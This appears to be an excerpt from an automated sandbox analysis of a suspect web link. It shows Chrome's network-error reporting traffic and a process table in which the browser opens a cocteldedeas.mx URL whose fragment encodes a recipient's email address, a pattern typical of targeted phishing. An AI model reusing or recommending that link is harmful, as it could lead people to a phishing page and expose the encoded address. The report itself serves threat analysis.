                                                                              2025-01-10 20:42:38 UTC532OUTOPTIONS /report/v4?s=B%2FYcNZJwfzROsmLaMejRP4nQWP26V75ofSPtiNrNpKr21uiSGzRhf1ymCXUajHfcz0jDdTANkGMcntPEtf8DSKxfdKjGAOqQKHGjIrAtyQrqrYdrRioxHZIwvAG2ZtcEcCg%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://cocteldedeas.mx
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:42:38 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: OPTIONS, POST
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-type, content-length
                                                                              date: Fri, 10 Jan 2025 20:42:38 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              61192.168.2.55008335.190.80.14432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:39 UTC474OUTPOST /report/v4?s=B%2FYcNZJwfzROsmLaMejRP4nQWP26V75ofSPtiNrNpKr21uiSGzRhf1ymCXUajHfcz0jDdTANkGMcntPEtf8DSKxfdKjGAOqQKHGjIrAtyQrqrYdrRioxHZIwvAG2ZtcEcCg%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 438
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:42:39 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 37 30 35 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 32 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 63 74 65 6c 64 65 64 65 61 73 2e 6d 78 2f 63 64 6e 2d 63 67 69 2f 63 68 61
                                                                              Data Ascii: [{"age":57051,"body":{"elapsed_time":1222,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},"type":"network-error","url":"https://cocteldedeas.mx/cdn-cgi/cha
                                                                              2025-01-10 20:42:39 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Fri, 10 Jan 2025 20:42:38 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:15:41:24
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                              Imagebase:0x7ff715980000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:2
                                                                              Start time:15:41:28
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1992,i,4909626885566366861,8010844917547904754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff715980000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:15:41:35
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t"
                                                                              Imagebase:0x7ff715980000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              No disassembly